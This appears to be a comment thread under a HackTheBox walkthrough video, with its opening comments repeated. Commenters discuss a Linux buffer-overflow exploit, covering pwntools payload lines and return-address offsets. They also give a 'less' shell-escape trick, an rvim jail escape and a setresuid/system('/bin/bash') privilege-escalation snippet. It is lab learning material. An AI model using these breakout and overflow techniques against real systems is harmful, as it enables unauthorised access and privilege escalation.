I got some questions... sometimes nmap scan didn't show the ports that I needed to enumerate. So only after I watched walkthrough I realise that there were indeed that ports open. Should I need to run nmap multiple times? Even in real life scenario?
That's a good point! I looked into it - it seems running Python within rvim isn't counted as an actual shell command, presumably it launches Python directly. This was resolved in February- github.com/vim/vim/issues/3904
For anyone who gets this error when running the script TypeError: can only concatenate str (not "bytes") to str In Python 3 complains about concatenate strings with bytes, and even bytes with bytes. I changed the line From -------------------------------- p.sendline("Pass " + junk + mem + buf) To --------------------------------------- p.sendline("PASS ") p.sendline(junk) p.sendline(mem) p.sendline(buf) p.interactive() Than I was able to get execute and get a shell.
I can't get why to add 32 to the vuln address can someone explain me? Like the memory address after overwritting points back to the junk so we have to add 28 but why the 4 ? Am completely lost here.
It’s been a while since I did this box but a memory register is 32 bits. I’m guessing I may have used pwntools or something to handle memory addresses for me in this video? If so it’s possible I didn’t assign enough characters to fully fill the space, when that happens it automatically prepends 0’s.
Let me try to explain for you and future viewers, 28 bytes to fill up the buffer so the next four bytes can overwrite the return address. Since we have the shellcode right after the return address, it would make sense to jump to that area, address for the shellcode in this case would be return_address+0x4 | Stack | ADDRESS | | ----------- | ------------- | | buffer(junk) | 0xffffd610 | 28 bytes long( ebp included) | ret address | 0xffffd610+28 | 4 bytes long | shellcode | 0xffffd610 +32 | shellcode starts here
You may be correct there - Probably just jumped the gun on that search due to the boxes name, and messing up my initial setuid file. I didn't know the interaction between SetUID and System()/Exec() stuff, so probably was just me getting lucky that SELinux exploit used exec(). Either way was fun talking about SELinux :)
The breakout performed in vi is similar to a case in which an attacker can break out of a shell using the command "less". Example: less /etc/profile Once viewing /etc/profile in "less", the following is entered: !/bin/sh This will break the attacker out of "less" and into a /bin/sh shell as a result. Source - gtfobins.github.io/gtfobins/less/
@ippsec Hi Ippsec. Your gdb looks pretty fancy. I can't find a proper gdbinit file, could you please share yours with us, or send a source where we could find it? It is easier to see the registers and stack on yours. The default gdbedit is not so handy. :(
I like this this video it has BOF on linux :D , but I notice the way you generate shellcode is so fast. usually I used msfvenom, try to seek badchar, and used encoder alpha_mixed, end up with 700bytes shellcode :D
Just couple more notes - reverse shell payload would not work in prod because it has 10.10.x.x ip address, which translates to \x0A\x0A. And 0A is a bad character for this binary. Also - SELinux escape is absolutely unnecessary, everything works without it - at least this worked for me int main(void){ setresuid(1000, 1000, 1000); system("/bin/bash"); }
Good catches didn't even bother looking at bad characters -- Should have creating a script to find bad characters would have been great content. Most of my asm experience comes from Windows boxes with mona, what did you use to hunt bad characters? Script it out in radare? Built indo peda? or Just do it manually? Additionally, yep SELinux escape was unnecessary just something I had done when seeing the output of the ID Command and name of the box. Try to keep my videos along the same path that I did the box in. Could of edited and changed that part of the video when I learned about the second way to get to adm . However, I still thought that was good content and fell it would of been disingenuous to make that big of an edit. Thanks for the comment thoe, in the end that's a main reason I do these videos to find out all the silly things I did when solving these boxes.
Unfortunately, I don't know. Mainly learn by doing, find vulnerable stuff with exploits. Debug and step through the exploit and try to figure out what's going on. Most people generally like getting paid if they are going to create a course, it's seriously hard work. If you go the "free" route, you're going to spend a lot more time trying to pick it up. At some point, you need to ask yourself what that time is worth to you. Do you find a way to purchase books or courses to get you up to speed where you can do work in the field within a year? Or do you take 2-3 years to learn it and delay getting a higher income? In the end. Both routes require money. If you have the self-discipline to finish what you start I'd wager it's actually cheaper to pay for the content up front. Knowing investing in yourself will pay off in the end.
@@shankaranarayana6568 It really helps if you timestamp where your question is at, this video is over 2 years old. That being said if you start a process with GDB, it disables ASLR can just tell because the memory address doesn't change between runs. Also, I believe the first few bits of an ASLR address look much different than non-aslr.
@@ippsec My bad, It's at 13:44. In the first run, the stack is at 0xff922ca8 and after you restart the process it's at 0xffffce70. But since we were working with ASLR on, we expected this to change. So was it the 0xffff range which gave it away? (is this common for ASLRed stack addresses? so far I've only seen ASLR on library addresses and the first few bits are 0xf77)
I just guessed "Morris1962!" because 1962 was the year he escaped!
Ippsec i have been w8 for new video from you .. i hope you had nice xmas and happy new year
Brilliant, glad I found your channel.
congrats on 100k dude :D
Top notch, as usual
I got some questions... sometimes nmap scan didn't show the ports that I needed to enumerate. So only after I watched walkthrough I realise that there were indeed that ports open. Should I need to run nmap multiple times? Even in real life scenario?
Thank you ippsec , keep going bro
The great course
nice work thank you
I'm wonder how you could escape from rvim (sudo), as this is restricted vim, end it should prevent shell execution.
That's a good point! I looked into it - it seems running Python within rvim isn't counted as an actual shell command, presumably it launches Python directly. This was resolved in February- github.com/vim/vim/issues/3904
For anyone who gets this error when running the script
TypeError: can only concatenate str (not "bytes") to str
In Python 3 complains about concatenate strings with bytes, and even bytes with bytes.
I changed the line
From
--------------------------------
p.sendline("Pass " + junk + mem + buf)
To
---------------------------------------
p.sendline("PASS ")
p.sendline(junk)
p.sendline(mem)
p.sendline(buf)
p.interactive()
Than I was able to get execute and get a shell.
I can't get why to add 32 to the vuln address can someone explain me? Like the memory address after overwritting points back to the junk so we have to add 28 but why the 4 ? Am completely lost here.
It’s been a while since I did this box but a memory register is 32 bits. I’m guessing I may have used pwntools or something to handle memory addresses for me in this video? If so it’s possible I didn’t assign enough characters to fully fill the space, when that happens it automatically prepends 0’s.
Let me try to explain for you and future viewers, 28 bytes to fill up the buffer so the next four bytes can overwrite the return address. Since we have the shellcode right after the return address, it would make sense to jump to that area, address for the shellcode in this case would be return_address+0x4
| Stack | ADDRESS |
| ----------- | ------------- |
| buffer(junk) | 0xffffd610 | 28 bytes long( ebp included)
| ret address | 0xffffd610+28 | 4 bytes long
| shellcode | 0xffffd610 +32 | shellcode starts here
Hey, so SUID worked for me without any SELINUX bypasses, I just copied my /bin/sh to the box and set the bit and boom. Interesting stuff
You may be correct there - Probably just jumped the gun on that search due to the boxes name, and messing up my initial setuid file. I didn't know the interaction between SetUID and System()/Exec() stuff, so probably was just me getting lucky that SELinux exploit used exec(). Either way was fun talking about SELinux :)
50:44 - does anyone know what he said about similar techniques? You can use it with the "less" command too? Can anyone elaborate?
The breakout performed in vi is similar to a case in which an attacker can break out of a shell using the command "less".
Example:
less /etc/profile
Once viewing /etc/profile in "less", the following is entered:
!/bin/sh
This will break the attacker out of "less" and into a /bin/sh shell as a result.
Source - gtfobins.github.io/gtfobins/less/
@@dayisnow you rock, thank you!
s!ck learned a lot watching this.
why we need to +32 to memory address ?
Because it is four more bytes to ESP. 1 byte = 8 bits, so 4 is 8*4 = 32 bits more
@ippsec Hi Ippsec. Your gdb looks pretty fancy. I can't find a proper gdbinit file, could you please share yours with us, or send a source where we could find it? It is easier to see the registers and stack on yours. The default gdbedit is not so handy. :(
Look up gdb peda.
I like this this video it has BOF on linux :D , but I notice the way you generate shellcode is so fast.
usually I used msfvenom, try to seek badchar, and used encoder alpha_mixed, end up with 700bytes shellcode :D
Never seen a box like this 😮😮😮
💖💖💖💖💖
Just couple more notes - reverse shell payload would not work in prod because it has 10.10.x.x ip address, which translates to \x0A\x0A. And 0A is a bad character for this binary. Also - SELinux escape is absolutely unnecessary, everything works without it - at least this worked for me
int main(void){
setresuid(1000, 1000, 1000);
system("/bin/bash");
}
Good catches didn't even bother looking at bad characters -- Should have creating a script to find bad characters would have been great content. Most of my asm experience comes from Windows boxes with mona, what did you use to hunt bad characters? Script it out in radare? Built indo peda? or Just do it manually?
Additionally, yep SELinux escape was unnecessary just something I had done when seeing the output of the ID Command and name of the box. Try to keep my videos along the same path that I did the box in. Could of edited and changed that part of the video when I learned about the second way to get to adm . However, I still thought that was good content and fell it would of been disingenuous to make that big of an edit.
Thanks for the comment thoe, in the end that's a main reason I do these videos to find out all the silly things I did when solving these boxes.
It's in the code - if it sees "
" or \x00 in password it stops there :) and
= \x0A
Very hard jail, but interesting
@ippsec ippsec can u suggest any good material for exploit dev or best free source ?/??
Unfortunately, I don't know. Mainly learn by doing, find vulnerable stuff with exploits. Debug and step through the exploit and try to figure out what's going on. Most people generally like getting paid if they are going to create a course, it's seriously hard work.
If you go the "free" route, you're going to spend a lot more time trying to pick it up. At some point, you need to ask yourself what that time is worth to you. Do you find a way to purchase books or courses to get you up to speed where you can do work in the field within a year? Or do you take 2-3 years to learn it and delay getting a higher income?
In the end. Both routes require money. If you have the self-discipline to finish what you start I'd wager it's actually cheaper to pay for the content up front. Knowing investing in yourself will pay off in the end.
What is group
You said GDB has taken over the memory address when you restarted the process. Could you please explain what happened?
Also, how did you figure that out from the address?
@@shankaranarayana6568 It really helps if you timestamp where your question is at, this video is over 2 years old. That being said if you start a process with GDB, it disables ASLR can just tell because the memory address doesn't change between runs. Also, I believe the first few bits of an ASLR address look much different than non-aslr.
@@ippsec My bad, It's at 13:44. In the first run, the stack is at 0xff922ca8 and after you restart the process it's at 0xffffce70. But since we were working with ASLR on, we expected this to change. So was it the 0xffff range which gave it away? (is this common for ASLRed stack addresses? so far I've only seen ASLR on library addresses and the first few bits are 0xf77)
GDB adds a few more environment variables to the executable this causes stack to shift.
I like to use immunity debuger with mona
Could you do the nightmare when it comes out i dare to finish it live you will make to the best pen tester
I’ve already done Nightmare. And sorry no live streams of HTB boxes take too long to retire
IppSec how if it will soon come?!
I'm a mod - We verify machines are working and solvable before releasing them.
👏👏👏👏